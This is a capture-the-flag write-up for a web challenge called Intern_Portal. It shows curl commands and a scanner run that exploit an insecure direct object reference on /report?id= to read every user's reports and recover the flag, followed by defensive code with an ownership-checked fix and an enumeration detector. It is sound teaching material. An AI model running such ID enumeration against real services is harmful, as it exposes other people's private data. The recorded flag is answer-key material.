Intern_Portal

Challenge

Imported from local notes.md.

Original Notes

Challenge Summary

  • Given: a live web application at http://23.179.17.92:5001 with no downloadable files.
  • Goal: find the flag from the intern portal.
  • Constraints: authenticated web challenge; only the app link is provided.

Initial Recon / Triage

  • Observations:
    • The app is a small Flask/Werkzeug portal with /login, /register, /logout, and a /report workflow.
    • After login, the dashboard lists report links as /report?id=<id> and allows creating new reports.
    • The report view rendered stored content literally (no template evaluation), so SSTI was not the issue.
    • Any authenticated user could request arbitrary report IDs and read other users' reports: the handler never checked ownership.
  • File identification:
    • No starting files were provided.
    • artifacts/scan_reports.py was created to enumerate report IDs and search report contents.
  • Entry points:
    • Authenticated access to /report?id=<id>.
    • Broken access control / IDOR on report IDs.

Hypotheses & Approach

  • Hypothesis 1: the report creation or display path might be vulnerable to SSTI because the prompt mentioned a custom report application.
  • Hypothesis 2: the real bug was weaker and more common: report IDs were directly accessible without ownership checks, allowing report enumeration.

Execution Steps (Reproducible)

Stage 1

Commands:

curl -iLs http://23.179.17.92:5001

# register a disposable user, then log in
curl -c cookies.txt -b cookies.txt -X POST http://23.179.17.92:5001/register \
-d 'username=<tempuser>&password=<temppass>'
curl -c cookies.txt -b cookies.txt -X POST http://23.179.17.92:5001/login \
-d 'username=<tempuser>&password=<temppass>'

Results:

  • Confirmed the application is a simple authenticated report portal.
  • The dashboard exposed report links in the form /report?id=<id>.

Stage 2

Commands:

curl -b cookies.txt 'http://23.179.17.92:5001/report?id=5630'
curl -b cookies.txt 'http://23.179.17.92:5001/report?id=5628'
curl -b cookies.txt 'http://23.179.17.92:5001/report?id=1'

Results:

  • Confirmed an IDOR: authenticated access to arbitrary report IDs returned other users' reports, not just the current user's content.

Stage 3

Commands:

cd /root/cit2026CTF/Intern_Portal
INTERN_PORTAL_USER=<tempuser> INTERN_PORTAL_PASS=<temppass> \
/usr/bin/python3 artifacts/scan_reports.py --start 1 --end 5631 --workers 24

Results:

  • The scanner output FLAG 347 CIT{Acc355_C0ntr0l_M@tt3rs!}, i.e. the flag in report ID 347.
  • The flag was stored inside report ID 347 and was readable through the broken access control on /report?id=, which served any report to any authenticated user.
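The access-control failure behind /report?id=, modelled as an added example (not the challenge's own code): a lookup with no ownership check beside one scoped to the current user, plus a check over constructed access-log lines that flags a session sweeping many distinct report IDs the way the scan above did. The in-memory store, the session-id log format and the 20-id threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed in-memory store standing in for the portal's report table (assumption:
# each report has an owner). The flag body is a placeholder, not the real flag.
REPORTS = {
    1: {"owner": "alice", "body": "weekly status"},
    347: {"owner": "admin", "body": "FLAG{placeholder}"},
    5630: {"owner": "tempuser", "body": "my own report"},
}

def report_vulnerable(report_id, current_user):
    """The bug behind /report?id=: any logged-in user can read any id."""
    rec = REPORTS.get(report_id)
    return (200, rec["body"]) if rec else (404, None)

def report_fixed(report_id, current_user):
    """Fix: the lookup is scoped to the caller, and a foreign id is answered
    exactly like a missing one so the response does not reveal that it exists."""
    rec = REPORTS.get(report_id)
    if rec is None or rec["owner"] != current_user:
        return (404, None)
    return (200, rec["body"])

# Detection side: one session touching many distinct report ids is enumeration,
# regardless of whether the responses were 200 or 404.
# Assumed log format: <ip> sid=<session> "GET /report?id=<n> HTTP/1.1" <status>
LOG_RE = re.compile(
    r'^(?P<ip>\S+) sid=(?P<sid>\S+) "GET /report\?id=(?P<id>\d+) HTTP/1\.1" (?P<status>\d{3})'
)

def enumeration_sessions(log_lines, threshold=20):
    """Return {session_id: distinct_ids} for sessions at or above the threshold."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            seen[m.group("sid")].add(int(m.group("id")))
    return {sid: len(ids) for sid, ids in seen.items() if len(ids) >= threshold}

# Constructed sample log: one session sweeping ids 1..30, one user reading two reports.
SAMPLE_LOG = [f'10.0.0.9 sid=scan1 "GET /report?id={i} HTTP/1.1" 200' for i in range(1, 31)]
SAMPLE_LOG += [
    '10.0.0.5 sid=user7 "GET /report?id=5630 HTTP/1.1" 200',
    '10.0.0.5 sid=user7 "GET /report?id=5628 HTTP/1.1" 404',
]
```

With the fixed lookup the same sweep returns 404 for every report the caller does not own, and the log check still surfaces the sweeping session because it counts distinct ids rather than successes.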

Artifacts Produced

  • artifacts/scan_reports.py

Flag

CIT{Acc355_C0ntr0l_M@tt3rs!}